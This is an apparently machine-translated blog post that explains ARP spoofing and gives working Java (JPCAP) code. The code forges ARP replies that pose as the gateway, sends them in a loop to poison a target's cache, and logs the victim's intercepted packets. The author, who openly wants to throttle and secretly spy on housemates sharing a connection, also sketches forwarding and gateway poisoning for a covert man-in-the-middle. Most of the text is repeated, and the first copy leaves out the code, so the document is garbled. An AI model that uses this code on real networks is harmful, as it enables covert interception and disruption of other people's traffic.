Using JAVA to implement data packet listening through ARP spoofing similar to P2P terminator
- 2020-04-01 01:24:21
- OfStack
If there's one thing that's been bad lately, it's the pain of sharing the web, especially when other sharers are using peer-to-peer tools to download software and you're watching the progress bar crawl. Absolutely can not endure, so that the Internet to download P2P terminator, hum, you are not benevolence I do not justice, see who fierce. After the software is good, immediately start monitoring, and then tried the next speed, wow, that cool. Unfortunately, it didn't last long. Before long, the other side came to me and asked me why they cut off the Internet. I blanked for a while, that garbage software connect the other side of the net are broken, so the zhilu of deal with him, said I see, finally barely pass, fortunately they do not understand the computer, or it will fall big (looks pretty mean, don't BS I, I also have to).
Have no way, that piece of junk software incredibly connect the somebody else's net all was down, I just want to give them speed limit just (return calculate have a little conscience), careful check a few documents, the way that use all is ok, why can so? Think along while also have no idea, can't, it seems that only yourself, so get to the Internet to find some information about this aspect of the saw, and write a little bit of code to do test, due to the limited time of only write a little, but the overall approach is probably to understand somewhat, write an article about here to record your own practice, so as the diary can share with the public again.
In fact, the current network similar to P2P terminator software, mainly based on the implementation of ARP spoofing, the network is everywhere about the introduction of ARP spoofing, but in order to this article readers do not need to look up, I will explain it here.
ARP (Address Resolution Protocol) is an Address interpretation Protocol, which is mainly used for IP and MAC Address interpretation. IP is the network layer protocol, while MAC is used by the data link layer. Two nodes in a network to communicate, so first of all, the sender must want to know the source and destination MAC address, and the network layer is to use the IP address, so to get a MAC address, must through the IP address to obtain the corresponding MAC address, so you need to use the ARP protocol converts IP addresses to MAC addresses, while at the same time in order to be able to quickly find the destination MAC address of each node can have an ARP cache, used to hold has turned a good MAC address, you can use ARP � a command in the console view the ARP cache table.
Pass IP and the concrete process of ARP is when you need to get a MAC address, on the far side of the system will first check whether there is a corresponding IP address in the ARP table, if not, then send an ARP broadcast, when one has the MAC address of the node receives an ARP request, create an ARP reply packet, and send ARP request source node, in the ARP reply packet contains the MAC address of the destination node, the source node to receive the reply, the MAC address of the destination node will be saved in the ARP cache table, The next time the same IP address is requested again, the system will fetch the destination MAC address directly from the ARP table without sending ARP broadcasts again.
See here, the specific process of ARP roughly explained once, hope to be able to explain clearly. I believe that the friends must have started to consider the principle of ARP spoofing, in fact, is to use the ARP table for ARP spoofing, such as A LAN machine A, through the gateway B Internet connection, and its ARP table holds gateway B IP and MAC address pair, as follows:
192.168.1.1 - > MAC1(I don't want to write that long, so I use MAC1 as my MAC address)
In other words, when A wants to surf the Internet, all his data will be sent to the gateway first and then forwarded by the gateway. Then A's data will find the MAC address of the gateway through 192.168.1.1, and then the data can be sent to the gateway. Right now your machine is C, the MAC address is MAC2, you want to get A transmission of data by ARP cheat, so you have to do things actually very simple, is to A machine in the ARP table corresponding MAC address 192.168.1.1 MAC1 into MAC2, all this like A machine sent to 192.168.1.1 data will be sent to A MAC address for MAC2 machine, that is your machine.
To change the record of APR table is to forge an ARP reply packet is sent to A machine, and the ARP reply packet in the source IP is 192.168.1.1, MAC addresses into MAC2 is the MAC address of your machine, A machine will be received after the source IP and MAC to refresh its ARP cache table, covered the original records, so you can eventually achieve the goal of ARP deception.
At this point I don't know if you know anything about ARP deception? If you do not know then search the Internet search it, the Internet a lot of relevant information. Okay, that's the end of the principle, then it's time to implement, how do you implement ARP spoofing through JAVA?
To do it from beginning to end, of course, is not my style, the JAVA community is so large, we should make good use of it, to stand on the shoulders of giants to succeed, ha ha. JPCAP, an open source project, provides a mid-tier interface that allows users to call libraries such as wincap/libpcap to control network traffic, and the documentation is available on the official website.
Here, I implemented a simple packet interceptor that, according to the ARP spoofing principle, What we need to do is as follows :
1. Build an ARP Reply package
2. Send the packet to the machine that needs to be spoofed
The code is as follows:
Implements the above code to create an IP for 192.168.11.4 machine sent to ARP reply packet, which can be seen, the source IP for 192.168.11.1 reply packet, and the source MAC MAC address is changed to the current machine, device. Both mac_address, such as 192.168.11.4 machine receives the reply after package, will refresh the ARP table, and all send to 192.168.11.1 data will be sent to the actual operation of the program of the machine. A thread is created in the program to send reply packets in a loop, mainly because the ARP table will be updated within a certain period of time, so it needs to be sent continuously to ensure that its MAC address is changed at all times. At the same time, the main thread is used to listen and print all IP packet information of the current device. Originally, this method can only listen to the information of the native packet, but due to the use of ARP spooking, you will intercept the packet when 192.168.11.4 sends data to 192.168.11.1 and see the following information:
1216798614-885583/192.168.11.4 - > Protocol (6) priority(0) hop(128) offset(0) ident(34922) TCP 1337 > Win 8016 seq (1062321893) (65535) S
In fact, although the above program can intercept and listen to the packets of 192.168.11.4, but if it is really running, the machine of 192.168.11.4 will be unable to surf the Internet (assuming that the machine USES 192.168.11.1 as the gateway to surf the Internet), why?
This is because the machine intercepted 192.168.11.4 packets, but did not forward the packet, so in fact the packet to your machine is interrupted, the packet can not be sent out. Since machine to listen to each other, can't let each other know, of course, if you listen to the machine, but lead to the other party can't get to the Internet, fool also know there is a problem, so the above procedure to add a supplement, which is to forward the packet data in to the 192.168.11.1, as long as the intercepted packets to send out, exactly how do I leave to you want to, tired, rest, if you have friends who are interested in and can't think out how to do it, can ask me out, if necessary, post an example of a full point again next time.
By the way, the last thing to add is that we can flush the gateway's ARP in the same way, so that the data received by the gateway will be intercepted by the local machine and forwarded to the destination machine through the local machine. So the other side can be normal Internet access, and we can intercept the other side of the packet, if you want to limit the speed, that is in the interception of the packet at the same time, a certain delay, such as a second only to allow the number of K data through, can be manipulated here, the same, the specific how to leave you to think, ^ o ^.
Have no way, that piece of junk software incredibly connect the somebody else's net all was down, I just want to give them speed limit just (return calculate have a little conscience), careful check a few documents, the way that use all is ok, why can so? Think along while also have no idea, can't, it seems that only yourself, so get to the Internet to find some information about this aspect of the saw, and write a little bit of code to do test, due to the limited time of only write a little, but the overall approach is probably to understand somewhat, write an article about here to record your own practice, so as the diary can share with the public again.
In fact, the current network similar to P2P terminator software, mainly based on the implementation of ARP spoofing, the network is everywhere about the introduction of ARP spoofing, but in order to this article readers do not need to look up, I will explain it here.
ARP (Address Resolution Protocol) is an Address interpretation Protocol, which is mainly used for IP and MAC Address interpretation. IP is the network layer protocol, while MAC is used by the data link layer. Two nodes in a network to communicate, so first of all, the sender must want to know the source and destination MAC address, and the network layer is to use the IP address, so to get a MAC address, must through the IP address to obtain the corresponding MAC address, so you need to use the ARP protocol converts IP addresses to MAC addresses, while at the same time in order to be able to quickly find the destination MAC address of each node can have an ARP cache, used to hold has turned a good MAC address, you can use ARP � a command in the console view the ARP cache table.
Pass IP and the concrete process of ARP is when you need to get a MAC address, on the far side of the system will first check whether there is a corresponding IP address in the ARP table, if not, then send an ARP broadcast, when one has the MAC address of the node receives an ARP request, create an ARP reply packet, and send ARP request source node, in the ARP reply packet contains the MAC address of the destination node, the source node to receive the reply, the MAC address of the destination node will be saved in the ARP cache table, The next time the same IP address is requested again, the system will fetch the destination MAC address directly from the ARP table without sending ARP broadcasts again.
See here, the specific process of ARP roughly explained once, hope to be able to explain clearly. I believe that the friends must have started to consider the principle of ARP spoofing, in fact, is to use the ARP table for ARP spoofing, such as A LAN machine A, through the gateway B Internet connection, and its ARP table holds gateway B IP and MAC address pair, as follows:
192.168.1.1 - > MAC1(I don't want to write that long, so I use MAC1 as my MAC address)
In other words, when A wants to surf the Internet, all his data will be sent to the gateway first and then forwarded by the gateway. Then A's data will find the MAC address of the gateway through 192.168.1.1, and then the data can be sent to the gateway. Right now your machine is C, the MAC address is MAC2, you want to get A transmission of data by ARP cheat, so you have to do things actually very simple, is to A machine in the ARP table corresponding MAC address 192.168.1.1 MAC1 into MAC2, all this like A machine sent to 192.168.1.1 data will be sent to A MAC address for MAC2 machine, that is your machine.
To change the record of APR table is to forge an ARP reply packet is sent to A machine, and the ARP reply packet in the source IP is 192.168.1.1, MAC addresses into MAC2 is the MAC address of your machine, A machine will be received after the source IP and MAC to refresh its ARP cache table, covered the original records, so you can eventually achieve the goal of ARP deception.
At this point I don't know if you know anything about ARP deception? If you do not know then search the Internet search it, the Internet a lot of relevant information. Okay, that's the end of the principle, then it's time to implement, how do you implement ARP spoofing through JAVA?
To do it from beginning to end, of course, is not my style, the JAVA community is so large, we should make good use of it, to stand on the shoulders of giants to succeed, ha ha. JPCAP, an open source project, provides a mid-tier interface that allows users to call libraries such as wincap/libpcap to control network traffic, and the documentation is available on the official website.
Here, I implemented a simple packet interceptor that, according to the ARP spoofing principle, What we need to do is as follows :
1. Build an ARP Reply package
2. Send the packet to the machine that needs to be spoofed
The code is as follows:
public class LocalListener {
private final static String GATE_IP = "192.168.11.1";
private final static byte[] GATE_MAC = {0x00, 0x0a, (byte) 0xc5, 0x42, 0x6e, (byte) 0x9a};
private JpcapCaptor jpcap; //Connection to the device
private JpcapSender sender; //The instance used for sending
private Packet replyPacket; //ARP reply packet
private NetworkInterface device; //Current machine network card equipment
private IpMacMap targetIpMacMap; //Destination IP MAC pair
public LocalListener(IpMacMap target) throws Exception {
NetworkInterface[] devices = JpcapCaptor.getDeviceList(); device = devices[1];
this.targetIpMacMap = target;
initSender();
initPacket();
}
private void initSender() throws Exception {
jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000); // Open the Connection to the device
jpcap.setFilter("ip", true); //Only listen for IP packets
sender = jpcap.getJpcapSenderInstance();
}
private void initPacket() throws Exception {
//The source IP and MAC addresses of the reply package, and this ip-mac pair will be mapped to the ARP table
IpMacMap targetsSd = new IpMacMap(GATE_IP, device.mac_address);
//Creates a package that modifies the target machine's ARP
replyPacket = ARPPacketGern.genPacket(targetIpMacMap, targetsSd);
//Create the Ethernet header and package it into the reply package
replyPacket.datalink = EthernetPacketGern.genPacket(targetIpMacMap.getMac(),
device.mac_address);
}
public void listen() throws InterruptedException{
Thread t = new Thread(new Runnable() {
public void run() {
//Reply the reply packet, modify the destination arp table, the arp table will be updated in a period of time, so you need to keep sending
while(true){
send();
try {
Thread.sleep(500);
} catch (InterruptedException ex) {
Logger.getLogger(LocalListener.class.getName()).log(Level.SEVERE, null, ex);
}
}
}
});
t.start();
//Intercepts the packet receiving and receiving information of the current network equipment
while(true){
IPPacket ipPacket = (IPPacket)jpcap.getPacket();
System.out.println(ipPacket);
}
}}
//Ip-mac entity, used to hold only a pair of ip-mac addresses
public class IpMacMap {
private String ip;
private byte[] mac;
public IpMacMap(){
}
public IpMacMap(String ip, byte[] mac){
this.ip = ip;
this.mac = mac;
}
public String getIp() {
return ip;
}
public void setIp(String ip) {
this.ip = ip;
}
public byte[] getMac() {
return mac;
}
public void setMac(byte[] mac) {
this.mac = mac;
}
}
//ARP reply package generation class, which is used to generate reply packages based on destination and source addresses
public class ARPPacketGern{
public static ARPPacket genPacket(IpMacMap target, IpMacMap sender) throws Exception{
ARPPacket arpTarget = new ARPPacket();
arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER; //Select Ethernet type
arpTarget.prototype = ARPPacket.PROTOTYPE_IP; //Select the IP network protocol type
arpTarget.operation = ARPPacket.ARP_REPLY; //Select the REPLY type
arpTarget.hlen = 6; //MAC address length is fixed at 6 bytes
arpTarget.plen = 4; //IP address length is fixed at 4 bytes
arpTarget.target_hardaddr = target.getMac();
arpTarget.target_protoaddr = InetAddress.getByName(target.getIp()).getAddress();
arpTarget.sender_hardaddr = sender.getMac();
arpTarget.sender_protoaddr = InetAddress.getByName(sender.getIp()).getAddress();
return arpTarget;
}
}
//Ethernet header information is built based on destination MAC and source MAC to transmit data
public class EthernetPacketGern{
public static EthernetPacket genPacket(byte[] targetMac, byte[] senderMac) throws Exception {
EthernetPacket ethToTarget = new EthernetPacket(); //Create an Ethernet header
ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP; //Select the Ethernet package type
ethToTarget.dst_mac = targetMac;
ethToTarget.src_mac = senderMac;
return ethToTarget;
}
}
Implements the above code to create an IP for 192.168.11.4 machine sent to ARP reply packet, which can be seen, the source IP for 192.168.11.1 reply packet, and the source MAC MAC address is changed to the current machine, device. Both mac_address, such as 192.168.11.4 machine receives the reply after package, will refresh the ARP table, and all send to 192.168.11.1 data will be sent to the actual operation of the program of the machine. A thread is created in the program to send reply packets in a loop, mainly because the ARP table will be updated within a certain period of time, so it needs to be sent continuously to ensure that its MAC address is changed at all times. At the same time, the main thread is used to listen and print all IP packet information of the current device. Originally, this method can only listen to the information of the native packet, but due to the use of ARP spooking, you will intercept the packet when 192.168.11.4 sends data to 192.168.11.1 and see the following information:
1216798614-885583/192.168.11.4 - > Protocol (6) priority(0) hop(128) offset(0) ident(34922) TCP 1337 > Win 8016 seq (1062321893) (65535) S
In fact, although the above program can intercept and listen to the packets of 192.168.11.4, but if it is really running, the machine of 192.168.11.4 will be unable to surf the Internet (assuming that the machine USES 192.168.11.1 as the gateway to surf the Internet), why?
This is because the machine intercepted 192.168.11.4 packets, but did not forward the packet, so in fact the packet to your machine is interrupted, the packet can not be sent out. Since machine to listen to each other, can't let each other know, of course, if you listen to the machine, but lead to the other party can't get to the Internet, fool also know there is a problem, so the above procedure to add a supplement, which is to forward the packet data in to the 192.168.11.1, as long as the intercepted packets to send out, exactly how do I leave to you want to, tired, rest, if you have friends who are interested in and can't think out how to do it, can ask me out, if necessary, post an example of a full point again next time.
By the way, the last thing to add is that we can flush the gateway's ARP in the same way, so that the data received by the gateway will be intercepted by the local machine and forwarded to the destination machine through the local machine. So the other side can be normal Internet access, and we can intercept the other side of the packet, if you want to limit the speed, that is in the interception of the packet at the same time, a certain delay, such as a second only to allow the number of K data through, can be manipulated here, the same, the specific how to leave you to think, ^ o ^.